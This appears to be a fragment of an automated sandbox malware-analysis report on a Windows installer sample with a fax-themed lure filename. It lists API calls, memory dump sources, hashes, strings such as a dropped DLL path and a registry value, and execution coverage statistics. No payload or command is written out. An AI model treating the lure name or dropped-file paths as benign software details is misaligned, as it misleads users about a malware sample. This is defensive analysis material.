                                                                                              • Opcode ID: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                              • Instruction ID: 37c7ba0f9c491dd7f389852fcb35a119484072d927876f68e32cbd91f0a54eef
                                                                                              • Opcode Fuzzy Hash: 2f5760c81b9bdb573da93a40119b3bcbbfe2770e9a6cbc48a05e82d61b54c679
                                                                                              • Instruction Fuzzy Hash: 6D216B7150010ABBDF11AF94CE89EEF7B7DEB50384F110076F909B21E0D7B49E54AA68
                                                                                              APIs
                                                                                              • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                                                              • GetClientRect.USER32(?,?), ref: 00401DE5
                                                                                              • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                                                              • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                                                              • DeleteObject.GDI32(00000000), ref: 00401E39
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                              • String ID:
                                                                                              • API String ID: 1849352358-0
                                                                                              • Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                              • Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
                                                                                              • Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
                                                                                              • Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98
                                                                                              APIs
                                                                                              • GetDC.USER32(?), ref: 00401E51
                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                                                              • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                                                              • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                                                                • Part of subcall function 004066A5: lstrcatW.KERNEL32(: Completed,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                                                                • Part of subcall function 004066A5: lstrlenW.KERNEL32(: Completed,00000000,Spiltovene16,?,00405701,Spiltovene16,00000000), ref: 004068A4
                                                                                              • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                                                              • String ID:
                                                                                              • API String ID: 2584051700-0
                                                                                              • Opcode ID: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                                                              • Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
                                                                                              • Opcode Fuzzy Hash: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
                                                                                              • Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(naysaying\Kalewives\eckhardts,00000023,00000011,00000002), ref: 004024D5
                                                                                              • RegSetValueExW.ADVAPI32(?,?,?,?,naysaying\Kalewives\eckhardts,00000000,00000011,00000002), ref: 00402515
                                                                                              • RegCloseKey.ADVAPI32(?,?,?,naysaying\Kalewives\eckhardts,00000000,00000011,00000002), ref: 004025FD
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseValuelstrlen
                                                                                              • String ID: naysaying\Kalewives\eckhardts
                                                                                              • API String ID: 2655323295-1682491728
                                                                                              • Opcode ID: f0d36bf136ab2e25ec22a636268c30abe076e8f5014986b67977fa512c29c5ea
                                                                                              • Instruction ID: a516967871aadb8e7373f7254d3c24ec0cdbd982f2b4049ed7d94b0996b6da2b
                                                                                              • Opcode Fuzzy Hash: f0d36bf136ab2e25ec22a636268c30abe076e8f5014986b67977fa512c29c5ea
                                                                                              • Instruction Fuzzy Hash: 4011AF71E00108BEEF10AFA1CE49EAEB6B8EB44354F11443AF404B61C1DBB98D409658
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                                                              • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                                                              • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                                                              Strings
                                                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                              • API String ID: 2659869361-3081826266
                                                                                              • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                              • Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
                                                                                              • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                              • Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(C:\Program Files (x86)\Common Files\reddled\Ambicolorate195.dll), ref: 00402695
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen
                                                                                              • String ID: C:\Program Files (x86)\Common Files\reddled\Ambicolorate195.dll$naysaying\Kalewives\eckhardts
                                                                                              • API String ID: 1659193697-1032251976
                                                                                              • Opcode ID: 95f3013d55af84093136f48441009e61393afabdb60cbbacee1a07a6de825cdd
                                                                                              • Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
                                                                                              • Opcode Fuzzy Hash: 95f3013d55af84093136f48441009e61393afabdb60cbbacee1a07a6de825cdd
                                                                                              • Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F
                                                                                              APIs
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,74DF3420,?,74DF2EE0,00405D94,?,74DF3420,74DF2EE0,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405D94,?,74DF3420,74DF2EE0,00000000), ref: 00406098
                                                                                              • GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,74DF3420,?,74DF2EE0,00405D94,?,74DF3420,74DF2EE0), ref: 004060A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: P_B
                                                                                              • API String ID: 3248276644-906794629
                                                                                              • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                              • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                              • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                              • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                              APIs
                                                                                              • IsWindowVisible.USER32(?), ref: 0040566D
                                                                                              • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                                                                • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$CallMessageProcSendVisible
                                                                                              • String ID:
                                                                                              • API String ID: 3748168415-3916222277
                                                                                              • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                              • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                                                              • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                                                              • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                                                              APIs
                                                                                              • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,80000000,00000003), ref: 00405F89
                                                                                              • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,C:\Users\user\Desktop\Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exe,80000000,00000003), ref: 00405F99
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharPrevlstrlen
                                                                                              • String ID: C:\Users\user\Desktop
                                                                                              • API String ID: 2709904686-224404859
                                                                                              • Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                              • Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
                                                                                              • Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
                                                                                              • Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9
                                                                                              APIs
                                                                                              • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                                                              • lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
                                                                                              • CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
                                                                                              • lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1691479951.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1691463622.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691499605.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691517704.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1691706873.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.jbxd
                                                                                              Similarity
                                                                                              • API ID: lstrlen$CharNextlstrcmpi
                                                                                              • String ID:
                                                                                              • API String ID: 190613189-0
                                                                                              • Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
                                                                                              • Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
                                                                                              • Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

                                                                                              Execution Graph

                                                                                              Execution Coverage:1.9%
                                                                                              Dynamic/Decrypted Code Coverage:0%
                                                                                              Signature Coverage:1.4%
                                                                                              Total number of Nodes:1558
                                                                                              Total number of Limit Nodes:1
